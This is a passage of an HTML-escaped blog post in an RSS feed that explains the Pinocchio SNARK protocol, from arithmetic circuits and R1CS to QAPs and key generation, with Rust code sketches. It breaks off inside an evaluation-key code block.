          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/pinocchio-verifiable-computation-revisited/">&lt;h2 id=&quot;1-introduction&quot;&gt;1. Introduction&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;1-1-motivation&quot;&gt;1.1 Motivation&lt;&#x2F;h3&gt;
&lt;p&gt;Imagine you want to do a complex computation that you cannot carry out on your computer, or you need to get the results from a computer that you don’t trust. How can you be sure it was done correctly without redoing it yourself or understanding the intricate details? Introduced in 2013, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2013&#x2F;279.pdf&quot;&gt;Pinocchio&lt;&#x2F;a&gt; provides a solution using SNARKs. This technology enables a prover to demonstrate the correctness of their computations succinctly, so that others can verify them without revealing the details. Although Pinocchio itself has evolved and is no longer used in its original form, understanding it helps us appreciate the SNARKs that power today’s blockchain technologies, including ZK Rollups, which enhance scalability and privacy.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;1-2-what-is-a-snark&quot;&gt;1.2 What is a SNARK?&lt;&#x2F;h3&gt;
&lt;p&gt;So, Pinocchio is a SNARK protocol, but what is a SNARK? SNARK stands for Succinct, Non-Interactive Argument of Knowledge. &lt;em&gt;Succinct&lt;&#x2F;em&gt;, because we will have small proofs which are easy to verify. &lt;em&gt;Non-Interactive&lt;&#x2F;em&gt;, because the proof generated can be used to convince any number of verifiers without requiring direct interaction with the prover. &lt;em&gt;Argument of Knowledge&lt;&#x2F;em&gt;, because we know with very high probability that the prover is not cheating. Essentially, SNARK protocols offer us a method to “compress” a complex computation into a small, easy-to-verify proof.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;1-3-why-do-we-need-snarks&quot;&gt;1.3 Why do we need SNARKs?&lt;&#x2F;h3&gt;
&lt;p&gt;It sounds cool to be able to prove the validity of a computation without having to give its code, but what are the applications in the real world? Where is it used?&lt;&#x2F;p&gt;
&lt;p&gt;A prime example is &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;ethereum.org&#x2F;es&#x2F;developers&#x2F;docs&#x2F;scaling&#x2F;zk-rollups&#x2F;&quot;&gt;ZK Rollups&lt;&#x2F;a&gt;. Blockchains are verifiable computers; they achieve this verifiability by having each node re-execute every transaction and reach consensus. The problem is that the weakest devices become the bottleneck: contrary to what happens in web2, adding more hardware does not make the system faster. It becomes more robust and reliable, but the weakest devices continue to limit it. Using SNARKs, we can replace re-execution with the verification of a proof, which is significantly faster, increasing throughput. Moreover, we can create proofs covering entire blocks of transactions, leading to effective scaling. In summary, we can move execution off-chain to rollups and verify their proofs on-chain, allowing the system to scale.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;2-protocol-s-preliminaries-from-code-to-qap&quot;&gt;2. Protocol’s Preliminaries: From code to QAP&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;2-1-arithmetic-circuits&quot;&gt;2.1 Arithmetic Circuits&lt;&#x2F;h3&gt;
&lt;p&gt;The first thing we must do to use any SNARK protocol is find an efficient and systematic way to represent a computation, and that is exactly what arithmetic circuits provide: an arithmetic circuit is a computational model that represents arithmetic operations in a structured way, giving us a systematic method to describe and compute complex mathematical functions. To learn more about arithmetic circuits, see our post &lt;a href=&quot;&#x2F;how-to-transform-code-into-arithmetic-circuits&#x2F;&quot;&gt;How to transform code into arithmetic circuits&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Now, if the prover wanted to demonstrate that, given specific inputs, a particular piece of code returns certain outputs, she could simply send the corresponding arithmetic circuit to the verifier, with no other protocol needed. The problem is that such a proof would not be succinct at all; in practice, it would amount to sending the complete inputs and code. That is why, in order to achieve a succinct proof, we first convert the arithmetic circuit into what we call an R1CS and then transform the resulting R1CS into a QAP.&lt;&#x2F;p&gt;
&lt;p&gt;Below we broadly explain what R1CSs and QAPs are. It may be instructive to follow this explanation alongside its implementation, which can be found in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;884&quot;&gt;Pinocchio from the Lambdaworks library&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;2-2-r1cs&quot;&gt;2.2 R1CS&lt;&#x2F;h3&gt;
&lt;p&gt;R1CS stands for Rank-1 Constraint System. It allows us to express relationships between the circuit’s variables in a structured way using &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Matrix_(mathematics)&quot;&gt;matrix&lt;&#x2F;a&gt; equations. More specifically, given an arithmetic circuit with a valid solution $c$, our goal is to create a system of equations of the form $Ac \odot Bc = Cc$, with $A$, $B$ and $C$ matrices.&lt;&#x2F;p&gt;
&lt;p&gt;To fully understand what R1CS are and how to build them, we recommend reading &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.rareskills.io&#x2F;post&#x2F;rank-1-constraint-system&quot;&gt;this article&lt;&#x2F;a&gt;. Nevertheless, we enumerate here the steps to transform an arithmetic circuit into an R1CS.&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;Identify all the variables used in the circuit. Let’s call them $c = (1, c_1, \ldots, c_N, c_{N + 1}, \ldots, c_m)$, where $\{ c_1, \ldots, c_N \}$ are the public variables and $\{ c_{N + 1}, \ldots, c_m \}$ are the intermediate and private variables of the circuit.&lt;&#x2F;li&gt;
&lt;li&gt;Represent the circuit as a system of equations with variables $\{ c_i \}_{i = 1}^{m}$ and just one multiplication per equation. We will call each equation a &lt;em&gt;constraint&lt;&#x2F;em&gt; and $n$ the number of constraints.&lt;&#x2F;li&gt;
&lt;li&gt;Construct the matrix $A \in { \mathbb{F_p} }^{n \times m}$ as follows: $a_{ik}$ is the coefficient of the variable $c_k$ in the left factor of constraint $i$. (If you don’t know what ${ \mathbb{F_p} }^{n \times m}$ means, don’t worry: you can think of it as ${\mathbb{R}}^{n \times m}$, so $A$ is just a matrix of numbers.)&lt;&#x2F;li&gt;
&lt;li&gt;Analogously, construct the matrix $B$ whose rows represent the right factor of each constraint.&lt;&#x2F;li&gt;
&lt;li&gt;Construct the matrix $C$ whose rows represent the result of each constraint.&lt;&#x2F;li&gt;
&lt;li&gt;Finally, $c$ is a solution of the arithmetic circuit if and only if $Ac \odot Bc = Cc$, where $\odot$ represents the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Hadamard_product_(matrices)&quot;&gt;Hadamard Product&lt;&#x2F;a&gt;.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
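&lt;p&gt;The steps above can be sketched in a few lines of Rust. This is an illustrative toy, not the Lambdaworks implementation: it works over a small prime field using plain u64 arithmetic, and the constraint, matrices and witness are invented for the example.&lt;&#x2F;p&gt;

```rust
// Toy check of the R1CS relation Ac ∘ Bc = Cc over F_p (here p = 97).
const P: u64 = 97;

// Multiply an n×m matrix by a length-m vector, entries mod P.
fn mat_vec(m: &[Vec<u64>], v: &[u64]) -> Vec<u64> {
    m.iter()
        .map(|row| row.iter().zip(v).fold(0, |acc, (a, x)| (acc + a * x) % P))
        .collect()
}

// True iff Ac ∘ Bc = Cc, where ∘ is the Hadamard (entrywise) product.
fn r1cs_holds(a: &[Vec<u64>], b: &[Vec<u64>], c_mat: &[Vec<u64>], c: &[u64]) -> bool {
    let (ac, bc, cc) = (mat_vec(a, c), mat_vec(b, c), mat_vec(c_mat, c));
    ac.iter().zip(&bc).zip(&cc).all(|((x, y), z)| x * y % P == *z)
}

fn main() {
    // One constraint, c1 * c1 = c2, with witness c = (1, c1, c2) = (1, 3, 9).
    let a = [vec![0, 1, 0]];
    let b = [vec![0, 1, 0]];
    let c_mat = [vec![0, 0, 1]];
    assert!(r1cs_holds(&a, &b, &c_mat, &[1, 3, 9]));
    assert!(!r1cs_holds(&a, &b, &c_mat, &[1, 3, 8])); // wrong witness fails
}
```

&lt;p&gt;Each constraint contributes one row to $A$, $B$ and $C$, so the whole circuit check collapses into a single matrix identity.&lt;&#x2F;p&gt;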
&lt;h3 id=&quot;2-3-qap&quot;&gt;2.3 QAP&lt;&#x2F;h3&gt;
&lt;p&gt;So now we know that programs can be represented as arithmetic circuits and further converted into an R1CS. However, directly evaluating R1CS for verification purposes still isn’t succinct due to the large number of operations required, especially for complex computations. Quadratic Arithmetic Programs (QAPs) address this issue by providing a more efficient representation.&lt;&#x2F;p&gt;
&lt;p&gt;QAPs encode the constraints of an R1CS into sets of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Polynomial&quot;&gt;polynomials&lt;&#x2F;a&gt;. This allows multiple constraints to be batched into a single polynomial equation. But why does using polynomials make the proof succinct? It’s all thanks to the mathematical result known as the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Schwartz%E2%80%93Zippel_lemma&quot;&gt;Schwartz-Zippel Lemma&lt;&#x2F;a&gt;. To see in detail why this lemma makes the proof succinct and how we transform an R1CS into a QAP we recommend reading &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.rareskills.io&#x2F;post&#x2F;quadratic-arithmetic-program&quot;&gt;this chapter&lt;&#x2F;a&gt; of The RareSkills Book of ZK. Our goal is to be able to test the validity of a solution of the R1CS, checking that a certain polynomial has a given property. We leave here the steps with the notation that we will use below in the protocol:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;Receive the R1CS: $Ac \odot Bc = Cc$ where $A, B, C \in {\mathbb{F }_p }^{n \times m}$ and $c \in {\mathbb{F }_p }^m$.&lt;&#x2F;li&gt;
&lt;li&gt;Transform each column of $A$, $B$ and $C$ into polynomials: for each $k \in \{1, \ldots, m\}$, interpolate the points $(1, a_{1k}), \ldots, (n, a_{nk})$, where $(a_{1k}, \ldots, a_{nk})$ is the column $k$ of $A$. We will call the resulting polynomial $v_k(x)$. Analogously, $w_k(x)$ and $y_k(x)$ interpolate the columns of $B$ and $C$ respectively.&lt;&#x2F;li&gt;
&lt;li&gt;Define the polynomials $$\begin{align}
p(x) &amp;amp;= \left(\sum_{k = 1 }^m c_k v_k(x) \right) \left(\sum_{k = 1 }^m c_k w_k(x) \right) - \sum_{k = 1 }^m c_k y_k(x), \newline
t(x) &amp;amp;= (x - 1)( x - 2)\ldots( x - n).
\end{align}$$ We will call $t(x)$ the &lt;em&gt;vanishing polynomial&lt;&#x2F;em&gt;.&lt;&#x2F;li&gt;
&lt;li&gt;Finally, $c$ is a solution of the R1CS if and only if there exists a polynomial $h$ such that $p(x) = h(x)t(x)$. This can be checked by choosing a random $s$ and verifying that $p(s) = h(s)t(s)$.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
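&lt;p&gt;Continuing the toy example from the R1CS section, the steps above can be sketched directly: interpolate the columns with Lagrange’s formula and check that $t(x)$ divides $p(x)$, which holds exactly when $p$ vanishes at every constraint point $1, \ldots, n$. Again, this is a stdlib-only sketch with made-up matrices, not the Lambdaworks code.&lt;&#x2F;p&gt;

```rust
// Toy QAP construction over F_p: interpolate the R1CS columns, build p(x),
// and check t(x) | p(x) by verifying p vanishes at the constraint points.
const P: u64 = 97;

fn modpow(mut b: u64, mut e: u64) -> u64 {
    let mut acc = 1;
    b %= P;
    while e > 0 {
        if e & 1 == 1 { acc = acc * b % P; }
        b = b * b % P;
        e >>= 1;
    }
    acc
}
fn inv(a: u64) -> u64 { modpow(a, P - 2) } // Fermat's little theorem, P prime
fn sub(a: u64, b: u64) -> u64 { (a + P - b % P) % P }

// Evaluate at `x` the polynomial interpolating (1, ys[0]), ..., (n, ys[n-1]).
fn lagrange_eval(ys: &[u64], x: u64) -> u64 {
    let n = ys.len() as u64;
    let mut total = 0;
    for j in 1..=n {
        let mut term = ys[(j - 1) as usize];
        for k in 1..=n {
            if k != j {
                term = term * sub(x, k) % P * inv(sub(j, k)) % P;
            }
        }
        total = (total + term) % P;
    }
    total
}

// p(x) = (Σ c_k v_k(x)) (Σ c_k w_k(x)) − Σ c_k y_k(x), interpolating on the fly.
fn p_eval(a: &[Vec<u64>], b: &[Vec<u64>], c_mat: &[Vec<u64>], c: &[u64], x: u64) -> u64 {
    let col = |m: &[Vec<u64>], k: usize| m.iter().map(|row| row[k]).collect::<Vec<_>>();
    let sum = |m: &[Vec<u64>]| -> u64 {
        (0..c.len()).fold(0, |acc, k| (acc + c[k] * lagrange_eval(&col(m, k), x)) % P)
    };
    sub(sum(a) * sum(b) % P, sum(c_mat))
}

fn main() {
    // Two constraints: c1 * c1 = c2 and c2 * c1 = c3, witness c = (1, 3, 9, 27).
    let a = [vec![0, 1, 0, 0], vec![0, 0, 1, 0]];
    let b = [vec![0, 1, 0, 0], vec![0, 1, 0, 0]];
    let c_mat = [vec![0, 0, 1, 0], vec![0, 0, 0, 1]];
    let c = [1, 3, 9, 27];
    // t(x) = (x - 1)(x - 2) divides p(x) iff p(1) = p(2) = 0.
    assert_eq!(p_eval(&a, &b, &c_mat, &c, 1), 0);
    assert_eq!(p_eval(&a, &b, &c_mat, &c, 2), 0);
}
```

&lt;p&gt;At each constraint point $i$, $p(i)$ reduces to $(Ac)_i (Bc)_i - (Cc)_i$, so the divisibility condition encodes all the R1CS rows at once.&lt;&#x2F;p&gt;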
&lt;h2 id=&quot;3-pinocchio-s-protocol&quot;&gt;3. Pinocchio’s Protocol&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;3-1-the-idea-behind&quot;&gt;3.1 The idea behind&lt;&#x2F;h3&gt;
&lt;p&gt;Now we are ready to understand the protocol. It starts with a one-time setup, where two keys are generated for proving and verifying these computations. The prover, who performs the computation, uses her key to create a proof that is small and constant in size, regardless of the computation’s complexity. This proof is then verified efficiently through mathematical checks that ensure the computation was done correctly. The system not only supports public verification, allowing anyone with the verification key to check the proof, but it can also be extended to provide privacy-protecting zero-knowledge proofs.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;3-2-math-prelimenaries&quot;&gt;3.2 Math Preliminaries&lt;&#x2F;h3&gt;
&lt;p&gt;Understanding Pinocchio’s protocol requires familiarity with key mathematical concepts, primarily elliptic curves, finite fields, and group theory. These form the foundation of the cryptographic operations and security proofs in Pinocchio (and SNARK protocols in general). For a detailed exploration of elliptic curves, refer to our &lt;a href=&quot;&#x2F;what-every-developer-needs-to-know-about-elliptic-curves&#x2F;&quot;&gt;post&lt;&#x2F;a&gt; where we talk about them. For a primer on fundamental structures like groups and fields, see our &lt;a href=&quot;&#x2F;math-survival-kit-for-developers&#x2F;&quot;&gt;Math Survival Kit for Developers&lt;&#x2F;a&gt;. These resources provide the necessary background to appreciate Pinocchio’s intricate design.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;3-3-some-observations-to-understand-the-protocol&quot;&gt;3.3 Some observations to understand the protocol&lt;&#x2F;h3&gt;
&lt;ul&gt;
&lt;li&gt;The prover and verifier agree on a pairing-friendly elliptic curve and on generators of the groups $G_1$ and $G_2$, denoted by $g_1$ and $g_2$ respectively. In our case, we choose BLS12-381.&lt;&#x2F;li&gt;
&lt;li&gt;Technically, it is not necessary to work with two groups to implement the protocol. That is, the entire implementation can be interpreted using $G_1 = G_2 = G$ and $g_1 = g_2 = g$; in fact, the original Pinocchio paper presents it that way. However, Type I pairings (those whose domain is of the form $G \times G$) are very inefficient. Furthermore, BLS12-381 and BN254 are curves relevant to Ethereum, which is why we generally choose to work with them.&lt;&#x2F;li&gt;
&lt;li&gt;We use $+$ to denote the operation of the groups $G_1$ and $G_2$. For example, $\alpha_v \cdot g_2 = \underbrace{g_2 + \ldots + g_2}_{\alpha_v \text{ times}}$.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;&lt;h3 id=&quot;3-4-the-protocol&quot;&gt;3.4 The protocol&lt;&#x2F;h3&gt;
&lt;p&gt;In the following section we present the protocol along with some code snippets from the &lt;a href=&quot;https:&#x2F;&#x2F;lambdaclass.github.io&#x2F;lambdaclass_blog&#x2F;posts&#x2F;pinocchio-verifiable-computation-revisited&#x2F;link-here&quot;&gt;implementation&lt;&#x2F;a&gt; we made using the Lambdaworks library.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;setup&quot;&gt;Setup&lt;&#x2F;h4&gt;
&lt;p&gt;Select eight private random elements $s$, $\alpha_v$, $\alpha_w$, $\alpha_y$, $\beta$, $r_v$, $r_w$, $\gamma$ from $\mathbb{F_p}$, and set $r_y = r_v \cdot r_w$. This set of elements is called the &lt;em&gt;toxic waste&lt;&#x2F;em&gt; and must be discarded and wholly forgotten once the keys have been generated.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub struct ToxicWaste {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    rv: FE,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    rw: FE,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    s: FE,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; .... (other elements)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;impl ToxicWaste {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub fn sample() -&amp;gt; Self {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        Self {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            s: sample_fr_elem(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            alpha_v: sample_fr_elem(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; ... (other elements)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub fn ry(&amp;amp;self) -&amp;gt; FE {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;self.rv * &amp;amp;self.rw&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Two public keys are generated in the Setup: the evaluation key, which is sent to the prover, and the verification key, which is sent to the verifier.&lt;&#x2F;p&gt;
&lt;h5 id=&quot;the-verification-key&quot;&gt;The verification key&lt;&#x2F;h5&gt;
&lt;ol&gt;
&lt;li&gt;$g_2$&lt;&#x2F;li&gt;
&lt;li&gt;$\alpha_v \cdot g_2$&lt;&#x2F;li&gt;
&lt;li&gt;$\alpha_w \cdot g_2$&lt;&#x2F;li&gt;
&lt;li&gt;$\alpha_y \cdot g_2$&lt;&#x2F;li&gt;
&lt;li&gt;$\gamma \cdot g_2$&lt;&#x2F;li&gt;
&lt;li&gt;$\beta \gamma \cdot g_2$&lt;&#x2F;li&gt;
&lt;li&gt;$r_y t(s) \cdot g_1$&lt;&#x2F;li&gt;
&lt;li&gt;$\{r_v v_k(s) \cdot g_1 \}_{k \in \{0,\ldots, N \} }$&lt;&#x2F;li&gt;
&lt;li&gt;$\{r_w w_k(s) \cdot g_2 \}_{k \in \{0,\ldots, N \} }$&lt;&#x2F;li&gt;
&lt;li&gt;$\{r_y y_k(s) \cdot g_1 \}_{k \in \{0,\ldots, N \} }$&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;To implement this in Rust, we first create a VerificationKey struct holding each element and then generate it.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub struct VerificationKey {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub g2: G2Point,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub g2_alpha_v: G2Point,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub g2_alpha_w: G2Point,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; ...&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn generate_verification_key(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    qap: QuadraticArithmeticProgram,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    toxic_waste: &amp;amp;ToxicWaste,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; VerificationKey {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let g1: G1Point = Curve::generator();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let g2: G2Point = TwistedCurve::generator();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; declare the rest of the variables needed&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; ...&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    VerificationKey {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        g2: g2.clone(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        g2_alpha_v: g2.operate_with_self(toxic_waste.alpha_v.representative()),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;&#x2F; ... &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h5 id=&quot;the-evaluation-key&quot;&gt;The evaluation key&lt;&#x2F;h5&gt;
&lt;ol&gt;
&lt;li&gt;$\{r_v v_k(s) \cdot g_1 \}_{k \in \{N + 1, \ldots, m \}}$&lt;&#x2F;li&gt;
&lt;li&gt;$\{r_w w_k(s) \cdot g_1 \}_{k \in \{N + 1, \ldots, m \}}$&lt;&#x2F;li&gt;
&lt;li&gt;$\{r_w w_k(s) \cdot g_2 \}_{k \in \{N + 1, \ldots, m \}}$&lt;&#x2F;li&gt;
&lt;li&gt;$\{r_y y_k(s) \cdot g_1 \}_{k \in \{N + 1, \ldots, m \}}$&lt;&#x2F;li&gt;
&lt;li&gt;$\{r_v \alpha_v v_k(s) \cdot g_1 \}_{k \in \{N + 1, \ldots, m \}}$&lt;&#x2F;li&gt;
&lt;li&gt;$\{r_w \alpha_w w_k(s) \cdot g_1 \}_{k \in \{N + 1, \ldots, m \}}$&lt;&#x2F;li&gt;
&lt;li&gt;$\{r_y \alpha_y y_k(s) \cdot g_1 \}_{k \in \{N + 1, \ldots, m \}}$&lt;&#x2F;li&gt;
&lt;li&gt;$\{(r_v \beta v_k(s) + r_w \beta w_k(s) + r_y \beta y_k(s)) \cdot g_1 \}_{k \in \{N + 1, \ldots, m \}}$&lt;&#x2F;li&gt;
&lt;li&gt;$\{ s^i \cdot g_2 \}_{i \in \{ 1,\ldots,d \} }$ where $d$ is the degree of $t(x) = (x - 1) \ldots (x - n)$. That is, $d = n$, the number of rows of the R1CS matrices (i.e. the number of constraints).&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub struct EvaluationKey {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub g1_vk: Vec&amp;lt;G1Point&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub g1_wk: Vec&amp;lt;G1Point&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub g2_wk: Vec&amp;lt;G2Point&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; ... &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn generate_evaluation_key(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    qap: &amp;amp;QuadraticArithmeticProgram,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    toxic_waste: &amp;amp;ToxicWaste,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; EvaluationKey {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let g1: G1Point = Curve::generator();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let g2: G2Point = TwistedCurve::generator();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let (v_mid, w_mid, y_mid) = (qap.v_mid(), qap.w_mid(), qap.y_mid());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; declare the rest of the variables needed&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
